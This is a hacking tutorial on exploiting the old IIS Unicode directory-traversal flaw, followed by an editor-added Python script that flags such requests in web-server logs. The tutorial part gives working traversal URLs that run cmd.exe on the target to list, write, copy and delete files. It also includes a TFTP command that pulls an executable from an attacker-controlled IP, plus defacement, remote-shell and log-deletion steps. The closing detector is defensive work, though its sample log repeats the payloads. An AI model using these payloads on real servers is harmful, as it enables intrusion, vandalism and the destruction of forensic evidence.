HACKING UNICODE

Before anything else you need to know whether the host is running Windows NT or 2000, and Internet Information Server 4.0 or 5.0. This information can be obtained with fingerprinting or banner-grabbing techniques, or with scanners that report which operating system and which web server the target host is running. The next step is to find out whether the target is vulnerable to the Unicode bug. For that you can use vulnerability scanners such as nessus (Linux) or twwwscan (Windows); if the Unicode bug shows up, use unicodecheck.pl, a scanner written specifically for this flaw, to confirm that the host really is buggy, because vulnerability scanners sometimes report the vulnerability even though the system has already been patched.

Checking whether the host is buggy with the specific scanner:

Locating the root path:
  http://www.host.com/idq.idq
  "path not found c:\inetpub\wwwroot\idq.idq"

Running the scanner:
  perl unicodecheck.pl www.host.com:80 "dir c:\inetpub\wwwroot"

  # Sensepost.exe found - Executing [ dir c:\inetpub\wwwroot ] on www.host.com:80
  # HTTP/1.1 200 OK
  # Server: Microsoft-IIS/5.0
  # Date: Fri, 12 Jan 2001 13:52:52 GMT
  # Content-Type: application/octet-stream
  #  Volume in drive C has no label.
  #  Volume Serial Number is 543D-8959
  #
  #  Directory of c:\inetpub\wwwroot
  #
  # 01/11/2001  05:33p      <DIR>          .
  # 01/11/2001  05:33p      <DIR>          ..
  # 06/03/1999  09:13p                 342 aveia.gif
  # 06/03/1999  09:13p               1,736 index.html
  # 01/11/2001  05:33p      <DIR>          images
  # 09/22/1999  12:58p               7,240 start.asp
  # 06/03/1999  09:13p                 356 manta.gif
  # 06/03/1999  09:13p               2,806 pagao.gif
  # 01/11/2001  05:33p               2,497 post.html
  # 06/03/1999  09:13p               1,046 printing.gif
  # 06/03/1999  09:13p               1,577 war.gif
  # 06/03/1999  09:13p               1,182 woowoo.gif
  # 06/03/1999  09:13p               4,670 zetarock.gif
  # 01/11/2001  05:33p      <DIR>          _private
  # 01/11/2001  05:33p               1,759 _vti_inf.html
  # 01/11/2001  05:33p      <DIR>          _vti_log
  #               11 File(s)         25,211 bytes
  #                5 Dir(s)   1,066,082,304 bytes free

Studying the server:

You can use the browser to view the server's directories and files, e.g.:
  http://server/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
  http://server/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Note: you can also use dir+d:\ dir+e:\ dir+f:\ and so on to view the server's other hard disks/partitions. The c:\ directory is not listed, but all the others are.

Copying files, creating directories, writing and deleting files:
Creating a directory:
  http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\Manager_fix_this

Writing a txt file (same URL, with this in place of the command):
  /C+echo+anything+>c:\etc.txt

Copying:
  http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\caca.mdb

Deleting:
  http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:\caca.mdb

Viewing a txt file:
  http://server/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:\caca.txt

Uploading files:

You will need a TFTP server installed on your own machine; on Linux you can use tftp. Example:
  http://www.host.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp.exe+-i+200.200.200.200+get+file.exe+c:\destino\file.exe

Understanding it:
  tftp - the TFTP client of Windows NT/2000, which will download the file from your TFTP server.
  -i - indicates that the file being sent to the server is binary; when a plain text file (txt) is sent, this parameter can be left out.
  200.200.200.200 - IP address of the TFTP server where the file to be sent to the host is stored.
  get - indicates that the file must be fetched from the specified IP address.
  file.exe - name of the file to be sent.
  c:\destino - directory on the server the file will be sent to.
  file.exe - name the file will be given on the server.

Defacing:
  perl unicodexecute2.pl www.host.com:80 cmd/echo web site defaced > c:\inetpub\wwwroot\index.html

Getting shell access:
  perl unicode_shell.pl www.host.com:80

Deleting logs:
  http://host.com/cgi-bin/cmd.exe?/c+del+c:/winnt/system32/logfiles/in010323.log
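Every request on this page leaves the same distinctive trace in the web server's log (or in a proxy/IDS capture of the raw request line): a %c0 or %c1 byte after "..", which can never begin a valid UTF-8 sequence (both are "overlong" lead bytes, which is why the lax IIS decoder turned %c0%af into "/" and %c1%9c into "\" after the ".." check had already run), followed by a path that climbs above the site root into winnt\system32. The script below is an added example from the editor, not part of the original text and not the code of unicodecheck.pl or any other tool named here; it flags such requests in log lines. The log lines are constructed for the demo, and the simplified W3C field layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) together with the assumption that the stem field holds the URI exactly as the client sent it are assumptions.

```python
"""Flag IIS Unicode directory-traversal requests in W3C-style log lines.

Added example for this page, not the original text's or any tool's code.
Assumptions: a simplified W3C layout
  date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
and a stem field that still holds the percent-encoded URI the client sent.
"""
from __future__ import annotations

import re
from urllib.parse import unquote_to_bytes

# 0xC0 and 0xC1 can never start valid UTF-8: any two-byte sequence beginning
# with them is an overlong encoding of a 7-bit character.  The unpatched IIS
# decoder accepted them, so %c0%af became "/" and %c1%9c became "\".
OVERLONG_LEAD_BYTES = {0xC0, 0xC1}

# The two well-formed overlong pairs from the page, mapped the way the lax
# decoder did, so the resulting traversal can be shown and measured.
OVERLONG_PAIRS = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}

SYSTEM_TARGETS = re.compile(rb"(cmd\.exe|tftp\.exe|system32)", re.IGNORECASE)


def lenient_decode(uri: str) -> bytes:
    """Percent-decode once, then apply the lax mapping for the overlong pairs."""
    raw = unquote_to_bytes(uri)  # leaves non-hex forms such as %9v untouched
    for bad, good in OVERLONG_PAIRS.items():
        raw = raw.replace(bad, good)
    return raw


def escapes_webroot(path: bytes) -> bool:
    """True if the path climbs above the site root (more '..' than depth)."""
    depth = 0
    for seg in re.split(rb"[/\\]+", path):
        if seg == b"..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in (b"", b"."):
            depth += 1
    return False


def analyze_request(uri: str) -> list[str]:
    """Return the reasons a request URI looks like a Unicode traversal attempt."""
    findings = []
    if any(b in OVERLONG_LEAD_BYTES for b in unquote_to_bytes(uri)):
        findings.append("overlong-utf8")  # catches %c0%9v, %c1%pc etc. as well
    decoded = lenient_decode(uri)
    if escapes_webroot(decoded):
        findings.append("traversal-above-root")
    if SYSTEM_TARGETS.search(decoded):
        findings.append("system-binary")
    return findings


# Constructed sample log; the two benign lines are the controls.
SAMPLE_LOG = """\
2001-01-12 13:50:01 10.0.0.5 GET /index.html - 200
2001-01-12 13:52:52 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 200
2001-01-12 13:53:10 10.0.0.5 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe /c+tftp.exe+-i+200.200.200.200+get+file.exe 200
2001-01-12 13:54:30 10.0.0.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+del+c:/winnt/system32/logfiles/in010323.log 200
2001-01-12 13:55:00 10.0.0.7 GET /images/../start.asp - 200
2001-01-12 13:56:00 10.0.0.8 GET /scripts/..%c0%9v../winnt/system32/cmd.exe /c+dir+c:\\ 404
"""


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, client ip, findings) for every suspicious line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed or truncated line; skip it
        _date, _time, ip, _method, stem, _query, _status = fields[:7]
        findings = analyze_request(stem)
        if findings:
            hits.append((n, ip, findings))
    return hits


if __name__ == "__main__":
    for n, ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(findings)}")
```

Because the check keys on the invalid lead bytes rather than on a fixed list of variants, the non-hex forms on the page (%c0%9v, %c0%qf, %c1%8s, %c1%pc) are caught too, as the last sample line shows even though it got a 404. Any 200 on such a request means the traversal worked: the host needs the IIS patch, and both wwwroot (the defacement above overwrites index.html) and the logfiles directory (the last command above deletes a log) should be checked for tampering, ideally against a copy of the logs shipped off the box.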